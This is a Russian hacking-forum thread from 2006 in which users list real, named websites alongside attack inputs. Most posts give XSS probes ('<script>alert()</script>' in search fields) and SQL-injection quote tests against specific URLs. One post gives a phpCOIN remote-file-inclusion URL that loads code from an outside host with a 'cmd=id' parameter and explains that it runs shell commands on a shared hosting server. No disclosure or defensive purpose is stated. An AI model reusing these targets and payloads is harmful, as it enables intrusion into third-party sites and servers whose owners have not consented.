Баги на сайтах.

Обсуждение в разделе «Уязвимости», начал(-а) D1mOn, 28.01.2006.

Статус темы:
Тема закрыта для ответов.
  1. D1mOn

    D1mOn Elder - Старейшина

    Регистрация:
    2.10.2005
    Сообщения:
    429
    Одобрения:
    144
    Репутация:
    26
    Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!

    UPD: никаких рефереров! все линки даем исключительно так _http://
     
    #1 D1mOn, 28.01.2006
    В последний раз редактировалось модератором: 16.05.2006
    Это одобряют 4 пользоветелей.
  2. D1mOn

    D1mOn Elder - Старейшина

    Регистрация:
    2.10.2005
    Сообщения:
    429
    Одобрения:
    144
    Репутация:
    26
    http://www.generis.ru/?page=press_wholenews&id='
    http://www.integracija.gov.lv/forum/?setc=1&forumid='
    http://www.mossei.ru/?page='
    Вот для начала
     
    Это одобряет 1 пользователь.
  3. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    Идея хорошая принципы .

    _www.pansionmsu.ru , в строке поиска <script>alert()<script>
    _http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .

    _http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .
     
  4. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    _http://referat.star-info.ru

    В поиске если написать <i>i</i> то будет так

    Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
     
  5. Shurik

    Shurik New Member

    Регистрация:
    13.02.2006
    Сообщения:
    9
    Одобрения:
    1
    Репутация:
    0
    www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
    сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
    Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
     
  6. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    _http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact




    В графе поиск статьи <script>alert()</script>
     
    Это одобряет 1 пользователь.
  7. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    Справочник телефонов города Орла

    http://www.g-play.ru/orel/

    "Поиск организаций по названию, виду деятельности:"

    В поиске <script>alert()</script>
     
  8. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    Еще .

    1)


    url : _http://prohosting.fatpickle.com/search

    <script>alert()</script> в поиске .


    2)



    Url: _http://www.babr.ru/index.php?pt=pages


    <script>alert()</script> в поиске .

    3)

    url : _http://www.ambercity.ru/


    <script>alert()</script> в поиске .
     
    Это одобряет 1 пользователь.
  9. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    1)


    Url :_http://www.cityvision2000.com

    Можно узнать путь установки .

    В поиске <script>alert()</script>

    "D:\Webs\city\www\search.cgi": No such file or directory

    2)

    url: _http://www.pages.ru/

    Поиск <script>alert()</script>
     
    Это одобряет 1 пользователь.
  10. tclover

    tclover nobody

    Регистрация:
    13.12.2005
    Сообщения:
    763
    Одобрения:
    681
    Репутация:
    202
    _http://zna.nu/vg_eng.php?id='
    Интересный сайт :)
     
  11. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    Url : _http://xss.mask.ru/

    В поиске <script>alert()</script>
     
    Это одобряет 1 пользователь.
  12. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    Url : _http://www.miit.net

    <script>alert()</script> В поиске
     
  13. Gang100

    Gang100 Banned

    Регистрация:
    18.02.2006
    Сообщения:
    32
    Одобрения:
    24
    Репутация:
    21
    XSS-уязвимости

    1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.

    2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.

    3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.

    4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.

    5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
     
    #13 Gang100, 7.03.2006
    В последний раз редактировалось: 7.03.2006
    Это одобряют 2 пользоветелей.
  14. •••™NO FEAR™•••

    •••™NO FEAR™••• Elder - Старейшина

    Регистрация:
    8.08.2005
    Сообщения:
    716
    Одобрения:
    420
    Репутация:
    215
    И толку от них? Это пасивные XSS.
     
  15. max_pain89

    max_pain89 Eat `em UP!

    Регистрация:
    11.12.2004
    Сообщения:
    476
    Одобрения:
    140
    Репутация:
    113
    http://icq.rambler.ru/popup.html?ipath=<script>alert()</script>

    =) Люблю Аську.
     
  16. Nexwill

    Nexwill Elder - Старейшина

    Регистрация:
    2.08.2005
    Сообщения:
    140
    Одобрения:
    45
    Репутация:
    17
    _http://www.nne.ru/news.php?id=1429'<script>alert(/nexwill/)</script> Гы ))))) :D :D
     
    Это одобряет 1 пользователь.
  17. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    На __http://www.nne.ru Xss еще в поиске .
     
  18. Vandal

    Vandal Elder - Старейшина

    Регистрация:
    10.03.2005
    Сообщения:
    212
    Одобрения:
    18
    Репутация:
    3
    _http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vandal%22%29%3C%2Fscript%3E&-action.search=1
     
  19. seeattact

    seeattact Banned

    Регистрация:
    12.01.2006
    Сообщения:
    569
    Одобрения:
    87
    Репутация:
    6
  20. Gang100

    Gang100 Banned

    Регистрация:
    18.02.2006
    Сообщения:
    32
    Одобрения:
    24
    Репутация:
    21
    xss..

    1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&poisk=word
    2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=0&x=26&y=9
    3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script>
     
Загрузка...
Похожие темы
  1. Ответы:
    4
    Просмотры:
    1 130
  2. Ответы:
    20
    Просмотры:
    5 290
  3. Ответы:
    15
    Просмотры:
    2 162
  4. Ответы:
    2
    Просмотры:
    1 431
  5. Ответы:
    7
    Просмотры:
    2 607
Статус темы:
Тема закрыта для ответов.